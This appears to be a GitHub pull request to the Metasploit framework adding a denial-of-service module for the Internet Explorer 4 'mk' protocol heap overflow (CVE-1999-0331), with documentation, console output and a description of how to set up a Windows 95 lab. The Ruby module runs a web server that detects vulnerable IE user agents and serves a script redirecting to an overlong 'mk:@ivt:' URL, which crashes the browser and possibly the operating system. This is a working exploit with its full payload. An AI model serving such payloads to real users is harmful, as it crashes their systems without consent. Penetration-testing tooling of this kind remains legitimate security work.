### PR TITLE
ie4 mk dos (CVE-1999-0331)

### DIFF
--- a/documentation/modules/auxiliary/dos/browser/ie_mk_handler_dos.md
+++ b/documentation/modules/auxiliary/dos/browser/ie_mk_handler_dos.md
@@ -1,0 +1,37 @@
+## Vulnerable Application
+
+This module exploits a vulnerability found in Microsoft Internet Explorer 4 and
+4.01 on Windows 95 OSR1, OSR2, and NT Workstation/Server.
+
+A heap based buffer overflow in the handling of the 'mk' protocol can lead to remote
+code execution.  However, due to the age of the vulnerability, and the relatively
+rigid offset requirements based on IE version, the bug is simply put as a DoS as
+no one should be using IE4 in 2020+.
+
+This DoS will also crash the Active Desktop, and potentially Windows itself.
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use auxiliary/dos/browser/ie_mk_handler_dos`
+1. Do: `run`
+1. Do: Browse to the URL with IE4
+1. IE4/4.01 (and the Active Desktop) will crash.  Windows may also crash
+
+## Options
+
+## Scenarios
+
+### IE 4.01 on Windows 95
+
+```
+msf5 > use auxiliary/dos/browser/ie_mk_handler_dos
+msf5 auxiliary(dos/browser/ie_mk_handler_dos) > run
+[*] Auxiliary module running as background job 0.
+msf5 auxiliary(dos/browser/ie_mk_handler_dos) > 
+[*] Using URL: http://0.0.0.0:8080/v4o58g7d4IJX
+[*] Local IP: http://192.168.2.199:8080/v4o58g7d4IJX
+[*] Server started.
+[+] Vulnerable IE detected: Mozilla/4.0 (compatible; MSIE 4.01; Windows 95)
+[*] Sending HTML...
+```

--- a/documentation/modules/auxiliary/dos/browser/ie_mk_handler_dos.md
+++ b/documentation/modules/auxiliary/dos/browser/ie_mk_handler_dos.md
@@ -35,3 +35,6 @@ msf5 auxiliary(dos/browser/ie_mk_handler_dos) >
 [+] Vulnerable IE detected: Mozilla/4.0 (compatible; MSIE 4.01; Windows 95)
 [*] Sending HTML...
 ```
+
+![image (2)](https://user-images.githubusercontent.com/752491/89100925-5a97b380-d3c9-11ea-84db-cb72e9eb658c.png)
+![image (3)](https://user-images.githubusercontent.com/752491/89100926-5cfa0d80-d3c9-11ea-86fe-371a518fce19.png)

--- a/modules/auxiliary/dos/browser/ie_mk_handler_dos.rb
+++ b/modules/auxiliary/dos/browser/ie_mk_handler_dos.rb
@@ -1,0 +1,64 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Internet Explorer mk Protocol Handler DoS",
+      'Description'    => %q{
+          This module exploits a vulnerability found in Microsoft Internet Explorer 4 and
+        4.01 on Windows 95 OSR1, OSR2, and NT Workstation/Server.
+        A heap based buffer overflow in the handling of the 'mk' protocol can lead to remote
+        code execution.  However, due to the age of the vulnerability, and the relatively
+        rigid offset requirements based on IE version, the bug is simply put as a DoS as
+        no one should be using IE4 in 2020+.
+        This DoS will also crash the Active Desktop, and potentially Windows itself.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'DilDog', # l0pht
+          'h00die', # Metasploit module
+        ],
+      'References'     =>
+        [
+          [ 'URL', 'https://insecure.org/sploits/ms.ie.mk.url.html' ],
+          [ 'URL', 'http://web.archive.org/web/20000421180102/http://www.microsoft.com/windows/Ie/security/mk.asp' ],
+          [ 'URL', 'http://web.archive.org/web/19990427120547/http://l0pht.com/advisories/mkbug401.html' ],
+        ],
+      'Platform'       => 'win',
+      'Actions'        => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
+      'PassiveActions' => [ 'WebServer' ],
+      'DefaultAction'  => 'WebServer',
+      'Targets'        =>
+        [
+          [ 'Automatic', {} ],
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => 'Jan 14 1998',
+      'DefaultTarget'  => 0))
+  end
+
+  def on_request_uri(cli, request)
+    agent = request.headers['User-Agent']
+    uri   = request.uri
+
+    return unless /MSIE 4\.01?; Windows 95|nt/ =~ agent
+    print_good("Vulnerable IE detected: #{agent}")
+
+    print_status('Sending HTML...')
+    html = '<html><head></head><body>'
+    html << "<script>window.location.replace('mk:@ivt:#{'a'*300}')</script>"
+    html << '</body></html>'
+    send_response(cli, html, {'Content-Type'=>'text/html'})
+  end
+
+  def run
+    exploit # start http server
+  end
+end

--- a/modules/auxiliary/dos/browser/ie_mk_handler_dos.rb
+++ b/modules/auxiliary/dos/browser/ie_mk_handler_dos.rb
@@ -54,7 +54,7 @@ class MetasploitModule < Msf::Auxiliary
 
     print_status('Sending HTML...')
     html = '<html><head></head><body>'
-    html << "<script>window.location.replace('mk:@ivt:#{'a'*300}')</script>"
+    html << "<script>window.location.replace('mk:@ivt:#{Rex::Text.rand_text_alpha(300)}')</script>"
     html << '</body></html>'
     send_response(cli, html, {'Content-Type'=>'text/html'})
   end

--- a/modules/auxiliary/dos/browser/ie_mk_handler_dos.rb
+++ b/modules/auxiliary/dos/browser/ie_mk_handler_dos.rb
@@ -30,6 +30,7 @@ class MetasploitModule < Msf::Auxiliary
           [ 'URL', 'https://insecure.org/sploits/ms.ie.mk.url.html' ],
           [ 'URL', 'http://web.archive.org/web/20000421180102/http://www.microsoft.com/windows/Ie/security/mk.asp' ],
           [ 'URL', 'http://web.archive.org/web/19990427120547/http://l0pht.com/advisories/mkbug401.html' ],
+          [ 'CVE', '1999-0331' ]
         ],
       'Platform'       => 'win',
       'Actions'        => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],


### PR DESCRIPTION
This PR adds a DoS for IE4.  Why not make it a full RCE? Because no one should be running IE4 in 2020, let alone Windows 95, so I decided not to take the time to do such.

Because Win95 is so poorly built, ie4 will crash, active desktop will also crash, and there's a non-trivial (~30%-50%) chance Windows 95 itself will crash as well.

Instructions on installing Win95 in a VM can be found here: https://www.howtogeek.com/329301/how-to-install-windows-95-in-a-virtual-machine/
IF you get stuck at 78% on the IE4 install, see https://msfn.org/board/topic/147140-windows-95-c-osr-25-forced-ie4-install-solved/?tab=comments#comment-964717
Need Windows 95? https://winworldpc.com/product/windows-95/osr-2

## Verification

- [ ] install win95 OSR2 (with ie4)
- [ ] Start `msfconsole`
- [ ] `use auxiliary/dos/browser/ie_mk_handler_dos`
- [ ] `run`
- [ ] **Verify** you crash ie4, or win95 in total
- [ ] **Document** looks good

![image (2)](https://user-images.githubusercontent.com/752491/89100925-5a97b380-d3c9-11ea-84db-cb72e9eb658c.png)
![image (3)](https://user-images.githubusercontent.com/752491/89100926-5cfa0d80-d3c9-11ea-86fe-371a518fce19.png)
